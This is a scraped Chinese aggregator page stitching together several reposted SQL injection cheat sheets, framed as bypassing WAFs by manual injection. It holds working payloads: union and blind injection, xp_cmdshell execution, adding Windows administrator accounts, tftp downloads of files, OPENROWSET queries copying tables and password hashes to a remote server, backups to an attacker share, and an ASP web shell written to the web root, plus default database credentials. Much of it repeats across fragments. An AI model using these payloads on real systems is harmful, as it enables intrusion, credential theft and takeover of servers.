精华内容
下载资源
问答
  • 常见的SQL注入检测语句

    万次阅读 2016-04-26 12:40:24
    现在很多WAF都能拦截sqlmap、havij 等注入工具发包注入,所以这时我们需要在浏览器上使用hackerbar 进行手工注入,或者说是手工绕过注入攻击 0x01 发现SQL 注入 1 查询语法中断:单引号( ‘ ), 双引号( “ ) 2...

    0x00 前言

         现在很多WAF都能拦截sqlmap、havij 等注入工具的发包注入,所以这时我们需要在浏览器上使用hackerbar 进行手工注入,或者说是手工绕过注入攻击

    0x01 发现SQL 注入

    1 查询语法中断:单引号(  ‘  ), 双引号( “  )

    2 SQL注释注入:双连字符  (-- ), 散列 (# ), 注释( /* )

    3 扩展/附加查询: 分号 (  ;  )

    4 注射/绕过过滤器:使用 CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL  来转换上面的注入字符

    0x02 常用的SQL注入命令

    1 Union注入:Union all select NULL (Multiple columns)

    2 命令执行:1;exec master..xp_cmdshell ‘dir’>C:\inetpub\wwwroot\dir.txt’ OR master.dbo.xp_cmdshell

    3 加载文件:LOAD_FILE(), User UTL_FILE and utfReadfileAsTable

    4 添加用户:1’; insert into users values(‘nto’,’nto123’)

    5 DOS攻击:1’;shutdown –

    6 获取字段: select name from syscolumns where id =(select id FROM sysobjects where name = ‘target table name’) – (Union can help)Co

    0x02 常用的SQL盲注命令

    1 快速检测:AND 1=1, AND 1=0

    2 查询用户:1+AND+USER_NAME()=’dbo’

    3 延时注入:1;waitfor+delay+’0:0:10’

    4 检查SA用户:SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115

    5 跳转/休眠:BENCHMARK(TIMES, TASK), pg_sleep(10)

    0x03 数据库的默认用户名

    Oracle                  scott/tiger, dbsnmp/dbsnmp
    MySQL                  mysql/<BLANK>, root/<BLANK>
    PostgreSQL        postgres/<BLANK>
    MS-SQL               sa/<BLANK>
    DB2                     db2admin/db2admin

     

    0x04 常见的后台数据库SQL注入命令

    1 MySQL

    Grab                              @@version
    Users                            * from mysql.user
    Tables                         table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
    Database                    distinct(db) FROM mysql.db
    Columns                    table_schema, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ AND table_name == ‘<TABLENAME>’
    Running User               user()

    2 MS-SQL
    Grab version           @@version
    Users                      name FROM master..syslogins
    Tables                     name FROM master..sysobjects WHERE xtype = ‘U’
    Database                name FROM master..sysdatabases;
    Columns                name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘<TABLENAME’)
    Running User        DB_NAME()

    3 Oracle
    Grab  version          table v$version compare with ‘Oracle%’
    Users                      * from dba_users
    Tables                      table_name from all_tables
    Database                distinct owner from all_tables
    Columns                 column_name from all_tab_columns where table_name=‘<TABLENAME>
    Running User        user from dual

    4 IBM DB2
    Grab version          Versionnumber from sysibm.sysversions;
    Users                      user from sysibm.sysdummy1
    Tables                    name from sysibm.systables
    Database               schemaname from syscat.schemata
    Columns                name, tbname, coltype from sysibm.syscolumns
    Running User        user from sysibm.sysdummy1

    5 PostgreSQL
    Grab version           version()
    Users                     * from pg_user
    Database                datname FROM pg_database
    Running User         user;

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    展开全文
  • 常见SQL注入语句

    千次阅读 2012-04-12 10:18:47
    1.判断有无注入点  ; and 1=1 and 1=2  2.猜表一般名称无非是admin adminuser user pass password 等..  and 0  and 0  3.猜帐号数目 如果遇到0  and 0  and 1  4.猜解字段名称 在len( ) 括号...
           1.判断有无注入点
      ; and 1=1 and 1=2
      2.猜表一般的表的名称无非是admin adminuser user pass password 等..
      and 0<>(select count(*) from *)
      and 0<>(select count(*) from admin) ---判断是否存在admin这张表
      3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
      and 0<(select count(*) from admin)
      and 1<(select count(*) from admin)
      4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
      and 1=(select count(*) from admin where len(*)>0)--
      and 1=(select count(*) from admin where len(用户字段名称name)>0)
      and 1=(select count(*) from admin where len(密码字段名称password)>0)
      5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
      and 1=(select count(*) from admin where len(*)>0)
      and 1=(select count(*) from admin where len(name)>6) 错误
      and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
      and 1=(select count(*) from admin where len(name)=6) 正确
      and 1=(select count(*) from admin where len(password)>11) 正确
      and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
      and 1=(select count(*) from admin where len(password)=12) 正确
      6.猜解字符
      and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
      and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
      就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
      and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
      这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
      group by users. id having 1=1--
      group by users. id, users.username, users.password, users.privs having 1=1--
      ; insert into users values( 666, attacker, foobar, 0xffff )--
      UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
      UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN
      (login_id)-
      UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN
      (login_id,login_name)-
      UNION SELECT TOP 1 login_name FROM logintable-
      UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
      看服务器打的补丁=出错了打了SP4补丁
      and 1=(select @@VERSION)--
      看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限
      and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
      判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
      and sa=(SELECT System_user)--
      and user_name()=dbo--
      and 0<>(select user_name()--
      看xp_cmdshell是否删除
      and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
      xp_cmdshell被删除,恢复,支持绝对路径的恢复
      ;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
      ;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
      反向PING自己实验
      ;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
      加帐号
      ;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe
      /c net user jiaoniang$ 1866574 /add--
      创建一个虚拟目录E盘:
      ;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--
      访问属性:(配合写入一个webshell)
      declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
      爆库 特殊技巧::%5c=\ 或者把/和\ 修改%5提交
      and 0<>(select top 1 paths from newtable)--
      得到库名(从1到5都是系统的id,6以上才可以判断)
      and 1=(select name from master.dbo.sysdatabases where dbid=7)--
      and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
      依次提交 dbid = 7,8,9.... 得到更多的数据库名
      and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin
      and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。
      and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
      and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
      and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id
      and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
      (id,...)) 来暴出其他的字段
      and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名
      依次可以得到密码。。。。。假设存在user_id username ,password 等字段
      and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
      and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
      and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
      and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判断id值
      and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
      ?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
      ?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
      得到WEB路径
      ;create table [dbo].[swap] ([swappass][char](255));--
      and (select top 1 swappass from swap)=1--
      ;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread
      @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/,
      values=@test OUTPUT insert into paths(path) values(@test)--
      ;use ku1;--
      ;create table cmd (str image);-- 建立image类型的表cmd
      存在xp_cmdshell的测试过程:
      ;exec master..xp_cmdshell dir
      ;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
      ;exec master.dbo.sp_password null,jiaoniang$,1866574;--
      ;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
      ;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes
      /active:yes /add;--
      ;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
      exec master..xp_servicecontrol start, schedule 启动服务
      exec master..xp_servicecontrol start, server
      ; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32
      \cmd.exe /c net user jiaoniang$ 1866574 /add
      ;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe
      /c net localgroup administrators jiaoniang$ /add
      ; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件
      ;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
      ;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
      ;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
      如果被限制则可以。
      select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
      查询构造:
      SELECT * FROM news WHERE id=... AND topic=... AND .....
      adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
      select 123;--
      ;use master;--
      :a or name like fff%;-- 显示有一个叫ffff的用户哈。
      and 1<>(select count(email) from [user]);--
      ;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
      ;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
      ;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
      ;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
      ;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
      ;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
      上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
      通过查看ffff的用户资料可得第一个用表叫ad
      然后根据表名ad得到这个表的ID 得到第二个表的名字
      insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char
      (0x69)+char(0x73), 0xffff)--
      insert into users values( 667,123,123,0xffff)--
      insert into users values ( 123, admin--, password, 0xffff)--
      ;and user>0
      ;and (select count(*) from sysobjects)>0
      ;and (select count(*) from mysysobjects)>0 //为access数据库
      枚举出数据表名
      ;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
      这是将第一个表名更新到aaa的字段处。
      读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
      ;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
      然后id=1552 and exists(select * from aaa where aaa>5)
      读出第二个表,一个个的读出,直到没有为止。
      读字段是这样:
      ;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
      然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
      ;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
      然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
      [获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
      update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个])
      [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
      通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
      [获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
      update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
      绕过IDS的检测[使用变量]
      ;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
      ;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
      开启远程数据库
      基本语法
      select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
      参数: (1) OLEDB Provider name
      其中连接字符串参数可以是任何端口用来连接,比如
      select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
      复制目标主机的整个数据库insert所有远程表到本地表。
      基本语法:
      insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
      这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
      insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from
      table2
      insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
      select * from master.dbo.sysdatabases
      insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
      select * from user_database.dbo.sysobjects
      insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
      select * from user_database.dbo.syscolumns
      复制数据库:
      insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * fromdatabase..table2
      复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下:
      insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select
      * from database.dbo.sysxlogins
      得到hash之后,就可以进行暴力破解。
      遍历目录的方法: 先创建一个临时表:temp
      ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
      ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
      ;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
      ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
      ;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
      ;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
      ;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
      ;insert into temp(id) exec master.dbo.xp_cmdshell cscript. C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
      ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
      写入表:
      语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
      语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
      语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
      语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
      语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
      语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
      语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
      语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
      语句9:and 1=(SELECT IS_MEMBER(db_owner));--
      把路径写到表中去:
      ;create table dirs(paths varchar(100), id int)--
      ;insert dirs exec master.dbo.xp_dirtree c:\--
      and 0<>(select top 1 paths from dirs)--
      and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
      ;create table dirs1(paths varchar(100), id int)--
      ;insert dirs exec master.dbo.xp_dirtree e:\web--
      and 0<>(select top 1 paths from dirs1)--
      把数据库备份到网页目录:下载
      ;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
      and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
      and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
      and 1=(select user_id from USER_LOGIN)
      and 0=(select user from USER_LOGIN where user>1)
      -=- wscript.shell example -=-
      declare @o int
      exec sp_oacreate wscript.shell, @o out
      exec sp_oamethod @o, run, NULL, notepad.exe
      ; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
      declare @o int, @f int, @t int, @ret int
      declare @line varchar(8000)
      exec sp_oacreate scripting.filesystemobject, @o out
      exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
      exec @ret = sp_oamethod @f, readline, @line out
      while( @ret = 0 )
      begin
      print @line
      exec @ret = sp_oamethod @f, readline, @line out
      end
      declare @o int, @f int, @t int, @ret int
      exec sp_oacreate scripting.filesystemobject, @o out
      exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
      exec @ret = sp_oamethod @f, writeline, NULL,
      <% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
      declare @o int, @ret int
      exec sp_oacreate speech.voicetext, @o out
      exec sp_oamethod @o, register, NULL, foo, bar
      exec sp_oasetproperty @o, speed, 150
      exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 waitfor delay 00:00:05
      ; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec
      sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
      xp_dirtree适用权限PUBLIC
      exec master.dbo.xp_dirtree c:\
      返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
      create table dirs(paths varchar(100), id int)
      建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。
      insert dirs exec master.dbo.xp_dirtree c:\
      只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果.
    展开全文
  • 现在很多WAF都能拦截sqlmap、havij 等注入工具发包注入,所以这时我们需要在浏览器上使用hackerbar 进行手工注入,或者说是手工绕过注入攻击 0x01 发现SQL 注入 1 查询语法中断:单引号( ‘ ), 双引号( “ ) 2...

    0x00 前言

         现在很多WAF都能拦截sqlmap、havij 等注入工具的发包注入,所以这时我们需要在浏览器上使用hackerbar 进行手工注入,或者说是手工绕过注入攻击

    0x01 发现SQL 注入

    1 查询语法中断:单引号(  ‘  ), 双引号( “  )

    2 SQL注释注入:双连字符  (-- ), 散列 (# ), 注释( /* )

    3 扩展/附加查询: 分号 (  ;  )

    4 注射/绕过过滤器:使用 CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL  来转换上面的注入字符

    0x02 常用的SQL注入命令

    1 Union注入:Union all select NULL (Multiple columns)

    2 命令执行:1;exec master..xp_cmdshell ‘dir’>C:\inetpub\wwwroot\dir.txt’ OR master.dbo.xp_cmdshell

    3 加载文件:LOAD_FILE(), User UTL_FILE and utfReadfileAsTable

    4 添加用户:1’; insert into users values(‘nto’,’nto123’)

    5 DOS攻击:1’;shutdown –

    6 获取字段: select name from syscolumns where id =(select id FROM sysobjects where name = ‘target table name’) – (Union can help)Co

    0x02 常用的SQL盲注命令

    1 快速检测:AND 1=1, AND 1=0

    2 查询用户:1+AND+USER_NAME()=’dbo’

    3 延时注入:1;waitfor+delay+’0:0:10’

    4 检查SA用户:SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115

    5 跳转/休眠:BENCHMARK(TIMES, TASK), pg_sleep(10)

    0x03 数据库的默认用户名

    Oracle                  scott/tiger, dbsnmp/dbsnmp
    MySQL                  mysql/<BLANK>, root/<BLANK>
    PostgreSQL        postgres/<BLANK>
    MS-SQL               sa/<BLANK>
    DB2                     db2admin/db2admin

     

    0x04 常见的后台数据库SQL注入命令

    1 MySQL

    Grab                              @@version
    Users                            * from mysql.user
    Tables                         table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
    Database                    distinct(db) FROM mysql.db
    Columns                    table_schema, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ AND table_name == ‘<TABLENAME>’
    Running User               user()

    2 MS-SQL
    Grab version           @@version
    Users                      name FROM master..syslogins
    Tables                     name FROM master..sysobjects WHERE xtype = ‘U’
    Database                name FROM master..sysdatabases;
    Columns                name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘<TABLENAME’)
    Running User        DB_NAME()

    3 Oracle
    Grab  version          table v$version compare with ‘Oracle%’
    Users                      * from dba_users
    Tables                      table_name from all_tables
    Database                distinct owner from all_tables
    Columns                 column_name from all_tab_columns where table_name=‘<TABLENAME>
    Running User        user from dual

    4 IBM DB2
    Grab version          Versionnumber from sysibm.sysversions;
    Users                      user from sysibm.sysdummy1
    Tables                    name from sysibm.systables
    Database               schemaname from syscat.schemata
    Columns                name, tbname, coltype from sysibm.syscolumns
    Running User        user from sysibm.sysdummy1

    5 PostgreSQL
    Grab version           version()
    Users                     * from pg_user
    Database                datname FROM pg_database
    Running User         user;

     

     

     

    链接是:https://blog.csdn.net/qq_29277155/article/details/51248089

    转载于:https://www.cnblogs.com/linxiu-0925/p/9071786.html

    展开全文
  • 0x00 前言现在很多WAF都能拦截sqlmap、havij 等注入工具发包注入,所以这时我们需要在浏览器上使用hackerbar 进行手工注入,或者说是手工绕过注入攻击0x01 发现SQL 注入1 查询语法中断:单引号( ‘ ), 双引号( “ ...

    0x00 前言

    现在很多WAF都能拦截sqlmap、havij 等注入工具的发包注入,所以这时我们需要在浏览器上使用hackerbar 进行手工注入,或者说是手工绕过注入攻击

    0x01 发现SQL 注入

    1 查询语法中断:单引号(  ‘  ), 双引号( “  )

    2 SQL注释注入:双连字符  (-- ), 散列 (# ), 注释( /* )

    3 扩展/附加查询: 分号 (  ;  )

    4 注射/绕过过滤器:使用 CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL  来转换上面的注入字符

    0x02 常用的SQL注入命令

    1 Union注入:Union all select NULL (Multiple columns)

    2 命令执行:1;exec master..xp_cmdshell ‘dir’>C:\inetpub\wwwroot\dir.txt’ OR master.dbo.xp_cmdshell

    3 加载文件:LOAD_FILE(), User UTL_FILE and utfReadfileAsTable

    4 添加用户:1’; insert into users values(‘nto’,’nto123’)

    5 DOS攻击:1’;shutdown –

    6 获取字段: select name from syscolumns where id =(select id FROM sysobjects where name = ‘target table name’) – (Union can help)Co

    0x02 常用的SQL盲注命令

    1 快速检测:AND 1=1, AND 1=0

    2 查询用户:1+AND+USER_NAME()=’dbo’

    3 延时注入:1;waitfor+delay+’0:0:10’

    4 检查SA用户:SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115

    5 跳转/休眠:BENCHMARK(TIMES, TASK), pg_sleep(10)

    0x03 数据库的默认用户名

    Oracle                  scott/tiger, dbsnmp/dbsnmp

    MySQL                  mysql/, root/

    PostgreSQL        postgres/

    MS-SQL               sa/

    DB2                     db2admin/db2admin

    0x04 常见的后台数据库SQL注入命令

    1 MySQL

    Grab                              @@version

    Users                            * from mysql.user

    Tables                         table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’

    Database                    distinct(db) FROM mysql.db

    Columns                    table_schema, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ AND table_name == ‘’

    Running User               user()

    2 MS-SQL

    Grab version           @@version

    Users                      name FROM master..syslogins

    Tables                     name FROM master..sysobjects WHERE xtype = ‘U’

    Database                name FROM master..sysdatabases;

    Columns                name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘

    Running User        DB_NAME()

    3 Oracle

    Grab  version          table v$version compare with ‘Oracle%’

    Users                      * from dba_users

    Tables                      table_name from all_tables

    Database                distinct owner from all_tables

    Columns                 column_name from all_tab_columns where table_name=‘

    Running User        user from dual

    4 IBM DB2

    Grab version          Versionnumber from sysibm.sysversions;

    Users                      user from sysibm.sysdummy1

    Tables                    name from sysibm.systables

    Database               schemaname from syscat.schemata

    Columns                name, tbname, coltype from sysibm.syscolumns

    Running User        user from sysibm.sysdummy1

    5 PostgreSQL

    Grab version           version()

    Users                     * from pg_user

    Database                datname FROM pg_database

    Running User         user;

    链接是:https://blog.csdn.net/qq_29277155/article/details/51248089

    展开全文
  • (1)不用用户名和密码1 //正常语句2 $sql =”select * from phpben where user_name=’admin’and pwd =’123′”;3 //在用户名框输入’or’=’or’或 ‘or 1=’1 然后sql如下4 $sql =”select * from phpben where ...
  • 常见的四种sql语句delect,insert,update,delete注入逻辑 本人小白,刚刚入门,可能技术含量真的很低,但一定好好写,欢迎各位大佬的指点 select 语句 我觉得先假设个例子吧 最简单的就是一个通过出版商查书名的...
  • 什么是sql注入?所谓SQL注入,就是通过把SQL命令插入到 Web表单... 登录框(页面请求查询)二、SQL注入原理SQL注入(SQLInjection)是这样一种漏洞:当我们Web app 在向后台数据库传递SQL语句进行数据库操作时。如果对...
  • Perl-Critic-Policy-ValuesAndExpressions-PreventSQLInjection:PerlCritic策略,通过检测内插字符串中看起来像SQL语句的变量使用,尝试检测手工制作SQL语句中最常见SQL注入
  • WEB安全之SQL注入引言:在开发网站时候,出于安全考虑,需要过滤从页面...1、SQL注入步骤a)寻找注入点,构造特殊的语句传入SQL语句可控参数分为两类1. 数字类型,参数不用被引号括起来,如?id=12. 其他类型,参...
  • 一、SQL注入简介SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。二、SQL注入攻击的总体思路1.寻找到SQL注入...
  • 一些常见的SQL注入方法 一.联合注入 判断是否有注入点 ’ and 1=1–+ 猜列数 'order by 1–+ 一直猜到5报错,列数为4 猜库 'and 1=1改为and 1=2 'and 1=2 union select 1,2,3,4–+发现标题为2,内容为3,把2,3换成...
  • 1、最常用URL注入语句 sqlmap.py -u http://192.168.0.102/sqlserver/1.aspx?xxser=1 –level=LEVEL 执行测试等级(1-5,默认为1),使用–level 参数且数值>=2时候也会检查cookie里面参数
  • (1)不用用户名和密码1 //正常语句2 $sql =”select * from phpben where user_name=’admin’and pwd =’123′”;3 //在用户名框输入’or’=’or’或 ‘or 1=’1 然后sql如下4 $sql =”select * from phpben where ...
  • 常见SQL注入的方法

    2019-10-05 01:56:40
    WEB安全之SQL注入 引言: 在开发网站时候,出于安全考虑,需要过滤从页面传递过来字符。通常,用户可以通过以下接口调用数据库内容:URL地址栏、登陆界面、留言板、搜索框等。这往往给骇客留下了可乘之机。...
  • PHP常见漏洞 SQL注入***

    2013-09-25 17:50:19
    SQL注入***(SQL Injection),是***者... SQL注入***的一般步骤: 1、***者访问有SQL注入漏洞的站点,寻找注入点 2、***者构造注入语句注入语句和程序中的SQL语句结合生成新的sql语句 3、新的sql语句被提交到数据库...
  • 原文地址:Java防止SQL注入SQL 注入简介: SQL注入是最常见的攻击方式之一,它不是利用操作系统或其它系统的漏洞来实现攻击的,而是程序员因为没有做好判断,被不法用户钻了SQL的空子,下面我们先来看下什么是SQL注入:...
  • 使用Union语句进行SQL注入的基本原理

    千次阅读 2019-04-01 22:43:38
    使用Union语句进行SQL注入的基本原理 SQL注入是常见的网络攻击方法,之所以能够实现,是因为网页有着SQL漏洞。那么什么是SQL漏洞呢,理解SQL注入以及SQL漏洞就要从注入的基本概念和原理说起...所谓的SQL注入,是利...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,036
精华内容 414
关键字:

常见的sql注入语句